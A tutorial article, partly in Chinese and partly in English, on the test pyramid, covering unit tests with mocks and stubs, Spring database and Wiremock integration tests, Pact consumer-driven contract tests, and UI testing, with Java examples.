如果你去问三个人同样的问题:“单元”在单元测试的上下文中意味着什么,你很可能会获得四种非常相似的答案。某种程度上讲,对“单元”的定义取决于你自己,因此这个问题没有标准答案。

如果你正在使用函数式语言,一个单元最有可能指的是一个函数。你的单元测试将使用不同的参数调用这个函数,并断言它返回了期待的结果。在面向对象语言里,下至一个方法,上至一个类都可以是一个单元。

群居和独居

一些人主张,应该将被测试主体下的所有合作者(比如在测试里被你的类调用的其他类)都使用模拟或者桩替换掉,这样可以建立完美的隔离,避免副作用和复杂的测试准备。而有些人主张,只有那些执行起来很慢或者有较大副作用的合作者(比如读写数据库或者发送网络请求的类)才应该被模拟或者打桩替代。

偶尔有人会把用桩隔离所有依赖的测试称为独居单元测试,把和依赖有交互的测试称为群居单元测试(Jay Fields 的《Working Effectively with Unit Tests》这本书里创造了这些概念)。如果有空你可以继续深究下去,读一读不同思想流派各自的利弊在哪。

说到底,决定采用群居方式还是独居方式的单元测试其实并不重要。写自动化测试才是重要的。就我自己而言,我发现我自己经常两种方式都用。如果使用真正的合作者很麻烦,我就会用模拟对象或者桩。如果我觉得引用真正的合作者能让我对测试更有信心,我会仅仅打桩替代掉 service 最外层的依赖。

模拟和打桩(这里以及下文的桩都指 stub)

模拟对象和桩是两种不一样的测试替身(测试替身还不止这两种)。很多人会混用模拟对象和桩这两个概念。我认为,准确的用词会好点,并且最好能将它们各自的特性谙熟于心。你可以使用测试替身来替换掉真实的对象,给它一个可以更方便测试的实现。

换句话说,这意味着你是用一个假的实现来代替真的那个(例如,一个类,一个模块或者一个函数)。这个假的实现外表和行为和真的很像(都能响应同样的方法调用),只不过真实的响应内容是你在单元测试开始前就定义好的。

并不是在单元测试时我们才使用测试替身。还有很多精妙的测试替身能以非常可控的方式来模拟整个系统的功能。然而,在单元测试里使用模拟对象和桩的概率会更高(取决于你是喜欢群居风格还是独居风格的开发者),这主要是因为现代语言和库使得构建模拟对象和桩变得更加简单了。

不管你的技术选型是怎么样的,一般来说,编程语言的标准库或一些比较有名的三方库都会提供一些优雅的方式来帮你构建 mocks。即使需要自己编写 mock 对象,也只是写一个假类/模块/函数的事,只需要让它与真实的合作者有相同的签名,并设置到你的测试中去即可。
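为了更直观地说明,下面是一个手写桩的最小示意(其中 WeatherService、Greeter 均为演示而虚构的名字,并非本文示例应用里的真实类):

```java
// 手写桩:用一个签名相同、应答事先定义好的假实现替换真实合作者
public class HandWrittenStubDemo {
    interface WeatherService {            // 被测对象依赖的合作者接口
        String currentSummary();
    }

    static class Greeter {                // 被测主体
        private final WeatherService weather;
        Greeter(WeatherService weather) { this.weather = weather; }
        String greet() { return "Hello! Weather: " + weather.currentSummary(); }
    }

    public static void main(String[] args) {
        WeatherService stub = () -> "Rain";   // 桩:不发真实 HTTP 请求,直接返回固定应答
        String result = new Greeter(stub).greet();
        if (!"Hello! Weather: Rain".equals(result)) throw new AssertionError(result);
        System.out.println(result);
    }
}
```

真实项目里通常会用 Mockito 之类的库来生成这类替身,但手写版本有助于理解其本质。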

你的单元测试跑起来应该非常快。在一般的机器上跑完数千个单元测试应该只需要几分钟。为了得到快速的单元测试,你应该独立地测试代码库的每一小块,并避免进行真实的数据库操作、文件系统操作,或者发送真实的 HTTP 请求(使用模拟对象和桩来隔离这一部分)。

一旦你掌握了写单元测试的诀窍,你写起来就能越来越顺畅。打桩隔离掉外部依赖,准备一些输入数据,调用被测试的主体,然后检查返回值是不是你所期待的。看看测试驱动开发,让单元测试指引你的开发;如果使用得当,测试驱动开发将帮你进入一个非常顺畅的工作流,它能帮你创造出一个良好且可维护的设计,顺便还能送你一套全面且自动化的测试。当然,测试驱动开发并不是银弹。但是建议你尝试一下,看看它是否适合你。

应该测试什么?

单元测试有个好处,就是你可以为所有的产品代码类写单元测试,而不需要管它们的功能如何,或者它们在内部结构中属于哪个层次。你可以对 controller 进行单元测试,也可以用同样的方式对 repository、领域类或者文件读写类进行单元测试。良好的开端,从坚持一个实现类就有一个测试类的法则开始。

一个单元测试类至少应该测试这个类的公共接口。私有方法不能直接测试的原因是你不能从测试类直接调用它们。受保护的和包私有的方法可以被测试类直接调用(如果测试类和生产代码类的包结构是一样的),但是测试这些方法可能就太过了。

编写单元测试有一条细则:它们应该保证你代码所有的路径都被测试到(包括正常路径和边缘路径)。同时它们不应该和代码的实现有太紧密的耦合。

为什么这样说呢?

测试如果与产品代码耦合太紧,很快就会令人讨厌。当你重构代码时(快速回顾一下:重构意味着改变代码的内部结构而不改变其对外的行为)你的单元测试就会挂掉。

这样的话你就损失了单元测试的一大好处:充当代码变更的保护网。你很快就会厌烦这些愚蠢的测试,而不会感到它能带来好处,因为你每次重构测试就会挂掉,带来更多的工作量。不过说起来这些愚蠢的测试又是谁把它写成这样的呢?

那么正确的做法是什么?是不要在你的单元测试里耦合实现代码的内部结构。要测试可观测的行为。你应该这样思考:

如果我的输入是 x 和 y,输出会是 z 吗?

而不是这样:

如果我的输入是 x 和 y,那么这个方法会先调用 A 类,然后调用 B 类,接着输出 A 类和 B 类返回值相加的结果吗?

私有方法应该被视为实现细节。这就是为什么你不应该有去测试他们的冲动。 我经常听单元测试(或者 TDD)的反对者说,编写单元测试是无意义的工作,因为为了获得一个高的测试覆盖率,你必须测试所有的方法。他们经常引用这样的场景:一个过于激昂的团队领导强硬地让他们为 getter、setter 及其他所有琐碎的代码施加测试,以达到 100%的测试覆盖率。

这就大错特错啦。

确实你应该测试公共接口。但是更重要的是,不要去测试微不足道的代码。别担心,Kent Beck 说这样是 OK 的。你不会因为测试 getter,setter 抑或是其他简单的实现(比如没有任何条件逻辑的实现)而得到任何价值。把时间省出来,你就能多参加一个会了,万岁!
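用一个小例子体会“测试可观测的行为”:下面的 PriceCalculator 是虚构的演示类,测试只断言“输入 x 和 y 时输出是否为 z”,而不关心方法内部先调用了谁:

```java
// 只针对可观测行为做断言的示例(用 main + 断言代替测试框架,便于独立运行)
public class BehaviorTestDemo {
    static class PriceCalculator {
        int totalWithTax(int netPrice, int taxPercent) {
            return netPrice + netPrice * taxPercent / 100;
        }
    }

    public static void main(String[] args) {
        PriceCalculator subject = new PriceCalculator();
        int result = subject.totalWithTax(100, 20);   // 输入 x=100, y=20
        if (result != 120) throw new AssertionError("expected 120 but got " + result);
        System.out.println("totalWithTax(100, 20) = " + result);
    }
}
```

这样即使 totalWithTax 的内部实现被重构,只要对外行为不变,测试依然通过。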

测试结构

一个好的测试结构(不局限于单元测试)是这样的:

  1. 准备测试数据
  2. 调用被测方法
  3. 断言返回的是你期待的结果

这里有个口诀可以帮你记住这种结构:“Arrange,Act,Assert”。另一个口诀则是从 BDD 获取的灵感。就是“given”,“when”,“then”三件套,given 说的是准备数据,when 指的是调用方法,then 则是断言。

这种模式也可以应用于其他更高层次的测试。在任何情况下,它们都能让你的测试保持一致,易于阅读。除此之外,使用这种结构写出来的测试,往往更简短,更具表达力。
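这个结构可以用一个极简的骨架来示意(Calculator 为虚构的演示类,用 main + 断言代替测试框架):

```java
// Arrange / Act / Assert(即 given / when / then)三段式结构示意
public class ArrangeActAssertDemo {
    static class Calculator {
        int add(int a, int b) { return a + b; }
    }

    public static void main(String[] args) {
        // given(Arrange):准备测试数据
        Calculator subject = new Calculator();
        // when(Act):调用被测方法
        int result = subject.add(2, 3);
        // then(Assert):断言返回了期望的结果
        if (result != 5) throw new AssertionError("expected 5 but got " + result);
        System.out.println("result=" + result);
    }
}
```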

实现一个单元测试

知道了测什么、如何组织单元测试后,我们终于可以看一个真正的例子了。 让我们来看一个简化版的 ExampleController 类:

@RestController
public class ExampleController {

    private final PersonRepository personRepo;

    @Autowired
    public ExampleController(final PersonRepository personRepo) {
        this.personRepo = personRepo;
    }

    @GetMapping("/hello/{lastName}")
    public String hello(@PathVariable final String lastName) {
        Optional<Person> foundPerson = personRepo.findByLastName(lastName);

        return foundPerson
                .map(person -> String.format("Hello %s %s!",
                        person.getFirstName(),
                        person.getLastName()))
                .orElse(String.format("Who is this '%s' you're talking about?",
                        lastName));
    }
}

一个针对hello(lastname)方法的单元测试可能是这样的:

public class ExampleControllerTest {

    private ExampleController subject;

    @Mock
    private PersonRepository personRepo;

    @Before
    public void setUp() throws Exception {
        initMocks(this);
        subject = new ExampleController(personRepo);
    }

    @Test
    public void shouldReturnFullNameOfAPerson() throws Exception {
        Person peter = new Person("Peter", "Pan");
        given(personRepo.findByLastName("Pan"))
            .willReturn(Optional.of(peter));

        String greeting = subject.hello("Pan");

        assertThat(greeting, is("Hello Peter Pan!"));
    }

    @Test
    public void shouldTellIfPersonIsUnknown() throws Exception {
        given(personRepo.findByLastName(anyString()))
            .willReturn(Optional.empty());

        String greeting = subject.hello("Pan");

        assertThat(greeting, is("Who is this 'Pan' you're talking about?"));
    }
}

我们写单元测试用的是JUnit,Java 实际意义上的标准测试框架。我们使用Mockito来打桩隔离掉真正的PersonRepository类。这个桩允许我们在测试里重新定义 PersonRepository 被调用后产生的响应。桩能让我们的测试更简单,更可预测,更容易组织测试数据。

依照 Arrange,Act,Assert 的结构,我们写了两个单元测试:一个是正常的场景,另一个是找不到搜索人的场景。首先,正常场景创建了一个新的 person 对象,然后告诉 mock 类,当你接受到以“Pan”作为参数的调用时,返回这个 person 对象。这个测试接着调用了被测试方法。最后它断言返回值是等于期待结果的。

第二个测试和第一个类似,但它测试的是被测方法找不到对应人名时的场景。

集成测试

所有常见的应用都会和一些外部环境做集成(数据库,文件系统,向其他应用发起网络请求)。为了使测试有更好的隔离、运行更快,我们通常不会在编写单元测试时涉及这些外部依赖。不过,这些交互始终是存在的,它们也需要被测试覆盖到。这正是集成测试的用处所在。它们测试的是应用与所有外部依赖的集成。

对于自动化测试来说,不仅需要运行自己的应用,也需要运行与之集成的组件。如果要测试和数据库的集成,那就需要在跑测试的时候运行数据库。如果要测试能否从硬盘里读取文件,就需要先保存一个文件到硬盘上,然后在集成测试中去读取它。

前面我提到过「单元测试」是一个模糊的术语,对于集成测试而言,更是如此。对于一些人来讲,集成测试意味着去测试和多方应用产生交互的整个应用。我理解的集成测试更加狭义:每次只测试一个集成点。测试时应使用测试替身来替代其他的外部服务、数据库等。同时,使用契约测试对测试替身和真实实现进行覆盖。这样出来的集成测试更快,更独立,更易理解和调试。

狭义的集成测试测的是服务的边界。从概念上来说,这样的测试总是在触发导致应用和外部依赖(文件系统,数据库,其他服务等)集成的行为。比如说,一个数据库集成测试可能会这么写:

(一个集成了你的代码和数据库的集成测试)

  1. 启动数据库
  2. 连接应用到数据库
  3. 调用被测函数,该函数会往数据库写数据
  4. 读取数据库,查看期望的数据是不是被写到了数据库里

另一个例子,一个通过 REST API 和外部服务集成的测试可能是会这么写:

(这种集成测试检查了应用是否能正确和外部服务通信)

  1. 启动应用
  2. 启动一个被测外部服务的实例(或者一个具有相同接口的测试替身)
  3. 调用被测函数,该函数会从外部服务的 API 读取数据
  4. 检查应用是否能正确解析返回结果

与单元测试一样,集成测试也可以写得很白盒。一些框架在应用启动后,仍然支持对应用的一些部分进行 mock。 这使得你可以去检查正确的交互是否发生。

代码中所有涉及数据序列化和反序列化的地方都要写集成测试。这些场景可能比你想象得更多,比如说:

  • 调用自身服务的 REST API
  • 读写数据库
  • 调用外部服务的 API
  • 读写队列
  • 写入文件系统

为这些边界编写集成测试,保证了对外部系统的数据读写操作是正常工作的。

编写狭义的集成测试时,你应该尽可能在本地运行外部依赖,如启动一个本地的 MySQL 数据库、针对本地的 ext4 文件系统进行测试等。如果是与外部服务集成,可以在本地运行该服务的实例,或构建一个模拟真实服务的假服务,并在本地运行。

如果有些三方服务,你没法在本地运行一个实例,那么可以考虑运行一个专用实例,并在集成测试中指向它。避免在自动化测试里集成真实的生产环境的服务。向生产环境发出上千个测试请求是个惹人生气的好办法,因为你会扰乱日志(这是最好的情况),最坏的情况是你会对该服务产生 DoS 攻击。透过网络和一个服务集成是广义集成测试的一大特征,这会让你的测试更慢,通常也更难编写。

在测试金字塔中,集成测试的层级比单元测试更高。集成缓慢的外部依赖(如文件系统或数据库等)通常比隔离了这些依赖的单元测试需要更长时间。他们可能比小型并且独立的单元测试难写,毕竟你需要让外部依赖在你的测试中运行起来。然而,它的优势在于建立了你对应用能正确访问外部依赖的自信,这是单纯的单元测试做不到的。

数据库集成

PersonRepository 是代码里唯一的数据库类。它依赖于Spring Data,我们并没有实际去实现它。只需要继承CrudRepository接口并声明一个方法名。剩下的就是 Spring 魔法了,Spring 会帮我们实现其他所有的东西。

public interface PersonRepository extends CrudRepository<Person, String> {
    Optional<Person> findByLastName(String lastName);
}

对于CrudRepository接口,Spring Boot 提供了完整的 CRUD 方法例如findOne, findAll, save, update和delete。我们自定义的方法(findByLastName())继承了这些基础功能并实现了根据 last name 获取 Persons 对象的功能。Spring Data 会解析方法的返回类型,并按照命名规范解析方法名,从而决定如何实现方法。

虽然 Spring Data 已经实现了和数据库交互的功能,我还是写了一个数据库集成测试。你可能会反对,认为这是在测试框架,而我们应该避免测试不属于我们开发的代码。然则,我坚信在这里写一个集成测试是至关重要的。首先它测试了我们自定义的 findByLastName 方法实际的行为如我们所愿。次之,它证明了我们的数据库类正确地使用了 Spring 的装配特性,它是能正确连接到数据库的。

为了让你能更容易在本地把测试运行起来(而不必真的装一个 PostgreSQL 数据库),我们的测试会连接到一个内存H2数据库。

我已经在build.gradle里定义 H2 作为测试依赖。而测试目录下的application.properties没有定义任何spring.datasource属性。这会告诉 Spring Data 使用内存数据库,它会在 classpath 里找到 H2 来跑我们的测试。

当你用 int profile 真正启动应用时(例如把SPRING_PROFILES_ACTIVE=int设置到环境变量里),它会连接到application-int.properties里定义的 PostgreSQL 数据库。

我知道这涉及到了很多 Spring 的知识。你必须仔细阅读许多文档才能理解这个例子。实现代码只有几行,非常直观,但是如果你不知道 Spring 的一些知识点是很难加以理解的。

除此以外,测试使用内存数据库其实是有风险的。毕竟我们集成测试针对的数据库和我们生产用的数据库不一样。你可以自己选择,是利用 Spring 的强大能力获得简洁的代码,亦或者是写显式但较为冗长的实现。

解释已经足够多了,这里有一个集成测试的例子。它先保存了一个 Person 对象到数据库里,然后根据 last name 去查找它。

@RunWith(SpringRunner.class)
@DataJpaTest
public class PersonRepositoryIntegrationTest {
    @Autowired
    private PersonRepository subject;

    @After
    public void tearDown() throws Exception {
        subject.deleteAll();
    }

    @Test
    public void shouldSaveAndFetchPerson() throws Exception {
        Person peter = new Person("Peter", "Pan");
        subject.save(peter);

        Optional<Person> maybePeter = subject.findByLastName("Pan");

        assertThat(maybePeter, is(Optional.of(peter)));
    }
}

你可以看到我们的集成测试像单元测试那样遵循了arrange, act, assert的结构。我说过这是一个普适的概念吧。

和外部服务集成

我们的微服务会调用darksky.net——一个关于天气的 REST API。当然啦,我们希望保证服务调用时能发送正确的请求,并且能正确地解析响应。

跑自动化测试时,我们希望避免真实地调用darksky的服务。当然,我们使用的免费版有调用次数限制,这是个原因。但真正的原因是解耦。我们的测试应该能独立运行,而不需要管 darksky.net 可爱的开发者们在干些啥。即使我们的机器访问不到darksky服务器,或darksky服务器在进行宕机维护,都不应该使我们的测试挂掉。

我们可以在集成测试中用自己的假darksky服务器来代替真正的服务器。这听起来像是个巨大的任务。幸亏有像Wiremock这样的工具,事情变得很简单。看这里:

@RunWith(SpringRunner.class)
@SpringBootTest
public class WeatherClientIntegrationTest {

    @Autowired
    private WeatherClient subject;

    @Rule
    public WireMockRule wireMockRule = new WireMockRule(8089);

    @Test
    public void shouldCallWeatherService() throws Exception {
        wireMockRule.stubFor(get(urlPathEqualTo("/some-test-api-key/53.5511,9.9937"))
                .willReturn(aResponse()
                        .withBody(FileLoader.read("classpath:weatherApiResponse.json"))
                        .withHeader(CONTENT_TYPE, MediaType.APPLICATION_JSON_VALUE)
                        .withStatus(200)));

        Optional<WeatherResponse> weatherResponse = subject.fetchWeather();

        Optional<WeatherResponse> expectedResponse = Optional.of(new WeatherResponse("Rain"));
        assertThat(weatherResponse, is(expectedResponse));
    }
}

为了使用 Wiremock,我们在固定的端口(8089)实例化了一个WireMockRule。使用领域特定语言,我们可以配置一个 Wiremock 服务器,定义它需要监听的路径并设置相应的应答。

接着调用我们要测试的方法——它会调用第三方服务,然后检查结果是否能被正确解析。

理解测试怎样调用 Wiremock 服务器而不是真正的darksky很重要。秘密就在src/test/resources下的application.properties文件。这是 Spring 在运行测试时会加载的属性文件。出于测试目的——比如,调用一个假的 Wiremock 服务器而不是真实服务器——我们在这个文件里覆写了一些配置,如 API keys 和 URL 等:

weather.url = http://localhost:8089

值得注意的一点是,这里声明的端口必须和我们在测试里实例化WireMockRule时的端口保持一致。我们之所以能为了测试注入一个假的 API url,是因为我们通过注入的方式将 url 传给了WeatherClient类的构造函数:

@Autowired
public WeatherClient(final RestTemplate restTemplate,
                     @Value("${weather.url}") final String weatherServiceUrl,
                     @Value("${weather.api_key}") final String weatherServiceApiKey) {
    this.restTemplate = restTemplate;
    this.weatherServiceUrl = weatherServiceUrl;
    this.weatherServiceApiKey = weatherServiceApiKey;
}

这样我们告诉WeatherClient要把我们定义在 application properties 的weather.url值赋给weatherUrl。

借助类似 Wiremock 这样的工具,为外部服务编写狭义的集成测试就变得很简单。不幸的是这种方式有个缺点:如何保证我们启动的假服务器与真的服务行为一致?按我们目前的实现,当外部服务改变了它的 API 时,我们的测试依然能跑过。现在我们仅仅测试了WeatherClient可以解析假服务器返回的应答信息。这是个好的开始,但是它非常脆弱。如果使用端到端测试,针对真实服务的实例运行测试,而不使用假的服务,固然能解决这个问题,但这又会让我们对被测服务的可用性产生依赖。幸运的是,针对这个难题还是有更好的方案:针对真实和假的服务运行契约测试。这能保证我们集成测试里用的假服务是个忠实的测试替身。下面来看看这种方案是怎么工作的。

契约测试

越来越多现代软件组织发现,对于增长的开发需求,可以让不同的团队来开发同一系统的不同部分。每个团队负责构建独立、松耦合的服务,团队间开发不互相影响。最终再将这些服务集成为一个大而全的系统。最近关于微服务的讨论日益热烈,关注的正是这一点。

将系统拆分成多个更小的服务,常常意味着这些服务之间需要通过确定的(最好是定义明确的,但有时候会有变动演进)接口通信。

不同应用间的接口可能形态各异,或基于不同的技术栈。常见的有:

  • 基于 HTTPS 使用 JSON 交互的 REST 接口
  • 基于类似gRPC的 RPC(Remote Procedure Call,远程进程调用)接口
  • 使用队列构建的事件驱动架构

对于任意一个接口,一定会涉及两个实体:提供方和消费方。提供方为消费方提供数据。消费方处理来自提供方的数据。在 REST 世界里,提供方为所有要暴露的 API 创建一个 REST API;消费方则调用这些 API 来获取数据,或进一步触发其他的服务。而在一个由异步、事件驱动的世界,提供方(通常被称为发布者)发布数据到一个队列中;消费方(通常被称为订阅者)订阅这些队列,读取并处理相关数据。

(每一个接口都有提供方(或者发布者)和消费方(或者订阅者)实体。接口之间的规范可以视为是一个契约。)

当你把服务消费方和服务提供方分散到不同的团队去时,你就需要清楚地了解这些服务之间的接口(也就是我们所讲的契约)。传统的公司一般是通过以下的方式解决这个问题:

  • 写一个钜细靡遗的接口文档(就是契约)
  • 根据定义好的契约实现提供方服务
  • 把接口文档扔给隔壁的消费团队
  • 等。等到消费方团队实现接口消费部分的工作
  • 运行一些大型的、手动的系统测试,保证软件能正常工作
  • 祈祷双方团队永远都维持接口定义不变,不要把事情搞砸

越来越多现代软件开发团队已经把第五步和第六步用更加自动化的方式来替代:自动化契约测试保证了消费方和提供方实现的时候依然遵循契约。这种测试提供了一个良好的回归测试组合,保证契约的变更能被及早发现。

在现代敏捷组织,你应该选择效率高浪费少的路子。你们是在同一个公司里构建应用。比起扔出去一个面面俱到的文档,与其他服务的开发者们直接交流本应容易得多。毕竟他们是你的同事,而不是一个只能通过客户支持或合同进行沟通的第三方供应商。

消费方驱动的契约测试(Consumer-Driven Contract tests,CDC 测试)是让消费方驱动契约实现。使用 CDC,接口消费方会写测试,检查接口是不是返回了他们想要的所有数据。消费方团队会发布这些测试从而让提供方可以轻松获取到这些测试并执行。提供方团队现在可以一边运行 CDC 测试一边开发他们的 API 了。一旦所有测试通过,他们就知道已经实现了所有消费方想要的东西。

(契约测试保证了提供方和所有的消费方基于同一个定义好的接口契约。用 CDC 测试,消费者就可以通过自动化测试发布他们的需求,提供方则可以持续不断获取这些测试并执行)

这种方式允许提供方团队只实现必要的东西(让设计保持简约,YAGNI等)。提供方团队需要持续地获取并运行这些 CDC 测试(从他们的构建 Pipeline 里),从而能立即发现任何打破契约的代码变更。如果有代码变更破坏了接口,CDC 测试应该会执行失败,这样可以防止破坏性改动上线。当这些测试保持通过,团队就可以做任何他们想做的改动而不需要担心其他团队。使用消费方驱动测试的话,一般过程会是这样的:

  • 消费方团队根据他们期待的结果编写自动化测试
  • 发布自动化测试给提供方团队
  • 提供方持续不断地运行这些测试,并保持他们都能通过
  • 如果 CDC 测试挂掉了,则需要双方进行沟通

如果你的组织正在践行微服务,那么拥有 CDC 测试将是迈向自治团队的一大步。CDC 测试是一种促进团队交流的自动化途径。它们保证了团队间的接口能一直如期工作。如果有 CDC 测试挂掉,则可能是个好的信号,意味着你应该走过去到那个被测试影响的团队,了解他们最近是否有 API 变更,弄清楚你们希望如何处理这些变更。

一个稚嫩的 CDC 测试实现非常简单,比如说你可以对一个 API 发送请求,并断言响应中包含了你需要的所有东西。然后你把这些测试打包成可执行文件(.gem, .jar, .sh),并将它们上传到一个其他团队可以获取到的地方(例如一些诸如Artifactory这样的仓库)。

在过去几年里,CDC 正变得越来越受欢迎。同时也涌现了一些工具,使得编写及上传 CDC 更加简单。

在这些工具中,Pact可能是最显眼的一个了。它为编写提供方或消费方的测试提供了详尽的支持,为外部服务隔离提供了开箱即用的(打)桩工具,它还支持你与其他团队交换 CDC 测试。Pact 已经被移植到很多平台上,并且可以和 JVM 语言一起使用,例如 Ruby,.NET,JavaScript 等等。

如果你想开始编写 CDC 测试但不知道怎么开始,不妨试试 Pact。文档一开始可能会让你应接不暇。保持耐心克服一下。它能帮助你深刻理解 CDC 测试,也会让你更容易在团队合作时推行 CDC。

消费方驱动契约测试真的可以说是建立自治团队的基石,它让这样的团队充满自信,快速前行。不要掉队,好好读读相关的文档,尝试一下。一套稳固的 CDC 测试集非常宝贵,它让你能快速开发,同时又不会挂掉已有的服务,引起其他团队的不满。

消费方测试(我方团队)

上面的例子中,我们的微服务消费了天气 API。所以我们有责任写一个消费方测试来定义我们期望从 API 契约中获得的结果。

首先,我们要在build.gradle里引入一个库来写基于协议的消费方测试:

testCompile('au.com.dius:pact-jvm-consumer-junit_2.11:3.5.5')

得益于这个库,我们可以用协议的仿造服务来实现一个消费方测试:

@RunWith(SpringRunner.class)
@SpringBootTest
public class WeatherClientConsumerTest {

    @Autowired
    private WeatherClient weatherClient;

    @Rule
    public PactProviderRuleMk2 weatherProvider =
            new PactProviderRuleMk2("weather_provider", "localhost", 8089, this);

    @Pact(consumer="test_consumer")
    public RequestResponsePact createPact(PactDslWithProvider builder) throws IOException {
        return builder
                .given("weather forecast data")
                .uponReceiving("a request for a weather request for Hamburg")
                    .path("/some-test-api-key/53.5511,9.9937")
                    .method("GET")
                .willRespondWith()
                    .status(200)
                    .body(FileLoader.read("classpath:weatherApiResponse.json"),
                            ContentType.APPLICATION_JSON)
                .toPact();
    }

    @Test
    @PactVerification("weather_provider")
    public void shouldFetchWeatherInformation() throws Exception {
        Optional<WeatherResponse> weatherResponse = weatherClient.fetchWeather();
        assertThat(weatherResponse.isPresent(), is(true));
        assertThat(weatherResponse.get().getSummary(), is("Rain"));
    }
}

如果观察得仔细,你会发现WeatherClientConsumerTest和WeatherClientIntegrationTest很相似。这次我们用 Pact 取代了 Wiremock 来对服务器打桩。事实上消费方测试工作方式与集成测试完全一致:我们用打桩的方式隔离第三方服务,定义我们期望的响应,然后检查我们的客户端可以正确处理响应。从这个意义上讲,WeatherClientConsumerTest本身就是一个狭义的集成测试。这种方式相比使用 Wiremock 好在,它每次运行都会创建一个协议文件(会生成到target/pacts/&pact-name>.json)。这个协议文件使用特殊的 JSON 格式描述了这个契约的期望结果,它可以被用来验证我们打桩的服务与真实服务行为确实是一致的。我们可以把这个协议文件交给提供 API 的团队,他们可以根据这个文件的期望输出来编写提供方测试。这样的话他们就能测试,他们的 API 是不是满足我们期望的所有结果。

This is where the consumer-driven part of CDC comes from: the consumer drives the implementation of the interface by describing their expectations, and the provider has to make sure they fulfill all of them. No gold-plating, no YAGNI. Getting the pact file to the provider team can happen in several ways. A simple one is to check it into version control and tell the provider team to always fetch the latest version. A more advanced one is to use an artifact repository, a service like Amazon S3, or a pact broker. Start simple and grow as you need.

In real-world software you don't need both an integration test and a consumer test for the same client class. The sample codebase contains both only to show you how each is written. If you want to write CDC tests using pacts, I recommend sticking with the consumer test. The effort of writing the two kinds of test is the same, but the pact approach gives you the pact file as a bonus, which makes it easy for other teams to implement their provider tests. Of course this only works if you can convince the other team to use Pact as well. If that fails, integration tests with Wiremock are a decent fallback.

Provider test (the other team)

The provider test has to be implemented by the team providing the weather API. We're consuming a public API provided by darksky.net, so in theory the darksky team would implement a provider test to make sure they don't break the contract between their application and our service.

Obviously they don't care about our meager sample application and won't implement a CDC test for us. That's the big difference between a public API and microservices inside an organization. A public API can't possibly consider every single consumer, or it would do nothing but write tests all day. Within your own organization, however, you can and should. Your application will most likely serve a handful, maybe a couple of dozen, consumers at most. Writing provider tests for those interfaces shouldn't be a big deal, and it keeps the system stable.

Once the provider team gets the pact file, they run it against their own service. To do so they implement a provider test that reads the pact file, stubs out some test data, runs their service, and checks whether it returns the responses the pact file expects.

The Pact folks have written several libraries for implementing provider tests. The main GitHub repository gives you a good overview of which consumer and provider libraries are available; pick the one that matches your technology stack.

For simplicity, let's assume the darksky API is implemented in Spring Boot as well. In that case they could use the Spring pact provider library, which hooks nicely into Spring's MockMVC mechanism. A hypothetical provider test written by the darksky.net team would look like this:

@RunWith(RestPactRunner.class)
@Provider("weather_provider") // same as the "provider_name" in our clientConsumerTest
@PactFolder("target/pacts") // tells pact where to load the pact files from
public class WeatherProviderTest {
    @InjectMocks
    private ForecastController forecastController = new ForecastController();

    @Mock
    private ForecastService forecastService;

    @TestTarget
    public final MockMvcTarget target = new MockMvcTarget();

    @Before
    public void before() {
        initMocks(this);
        target.setControllers(forecastController);
    }

    @State("weather forecast data") // same as the "given()" in our clientConsumerTest
    public void weatherForecastData() {
        when(forecastService.fetchForecastFor(any(String.class), any(String.class)))
                .thenReturn(weatherForecast("Rain"));
    }
}

You can see that all the provider test has to do is load a pact file (e.g. via the @PactFolder annotation, pointing at previously downloaded pact files) and define how test data for the predefined states should be provided (e.g. using Mockito mocks). There is no custom test to implement; the tests are derived automatically from the pact file. It is important that the provider name and the states match the ones declared in the consumer test.

Provider test (our team)

We have seen how to test the contract between our service and the weather provider. With this interface our service acts as the consumer and the weather service as the provider. Thinking a little further, we'll see that our service also acts as a provider for others: it exposes a REST API with several endpoints that other systems consume.

We have just learned that contract tests are all the rage, so of course we'll write contract tests for this contract as well. Luckily we're using consumer-driven contracts, so all the consuming teams send us their pacts, which we can use to implement provider tests for our REST API.

First we add the pact-jvm-provider library:

testCompile('au.com.dius:pact-jvm-provider-spring_2.12:3.5.5')

The provider test follows the same pattern described before. For simplicity I've taken the pact file from a simple consumer and put it straight into our repository, which makes things easier for us. In a real project you'd probably want a more sophisticated mechanism to distribute pact files.

@RunWith(RestPactRunner.class)
@Provider("person_provider") // same as in the "provider_name" part in our pact file
@PactFolder("target/pacts") // tells pact where to load the pact files from
public class ExampleProviderTest {

    @Mock
    private PersonRepository personRepository;

    @Mock
    private WeatherClient weatherClient;

    private ExampleController exampleController;

    @TestTarget
    public final MockMvcTarget target = new MockMvcTarget();

    @Before
    public void before() {
        initMocks(this);
        exampleController = new ExampleController(personRepository, weatherClient);
        target.setControllers(exampleController);
    }

    @State("person data") // same as the "given()" part in our consumer test
    public void personData() {
        Person peterPan = new Person("Peter", "Pan");
        when(personRepository.findByLastName("Pan")).thenReturn(Optional.of
                (peterPan));
    }
}

The only thing ExampleProviderTest needs to do is provide the states defined in the pact file. When we run the provider test, Pact picks up the given pact file and fires HTTP requests against our service, which then responds according to the states we've set up.

UI tests

Most applications have some sort of user interface. In the context of web applications we typically talk about a web interface. People often forget, though, that beyond the fancy web UI there are plenty of other user interfaces: REST APIs and command-line interfaces are user interfaces, too.

UI tests check that the user interface of your application works as expected: user input triggers the right actions, data is presented to the user, the UI state changes correctly, and so on.

UI tests and end-to-end tests are sometimes (as by Mike Cohn) said to be the same thing. To me, this conflates two concepts that merely overlap.

Yes, testing your application end-to-end often means driving it through its user interface. The inverse, however, is not true.

Testing your user interface doesn't have to be done end-to-end. Depending on your technology stack, it can be as simple as writing unit tests for your frontend JavaScript code with the backend stubbed out.

For traditional web applications, UI tests can be done with tools like Selenium. If you consider a REST API to be your user interface, writing proper integration tests around your API serves exactly the same purpose.

With web interfaces there are several aspects of your UI you can test: behaviour, layout, usability and, as a few would argue, adherence to your design.

Fortunately, testing the behaviour of your user interface is pretty simple: click here, enter data there, and watch the state of the UI change accordingly. Modern single-page application frameworks (react, vue.js, Angular and the like) usually come with their own tools and helpers that let you test these interactions at a pretty low level (unit tests). Even if you roll your own frontend in plain JavaScript, you can use regular testing tools like Jasmine or Mocha. For a more traditional, server-side rendered application, Selenium-based tests will be your best choice.

Testing that your web application's layout stays intact is a little harder. Depending on your application and your users' needs, you may want to make sure that code changes don't accidentally break the page's layout.

The problem is that computers are notoriously bad at checking whether something "looks good" (maybe a clever machine-learning algorithm can change that in the future).

There are some tools you can try if you still want to include automated design checks in your build pipeline. Most of them use Selenium to open your application in different browsers, take screenshots, and compare them to previously taken ones. If the old and new screenshots differ by more than a configured threshold, the tool notifies you.
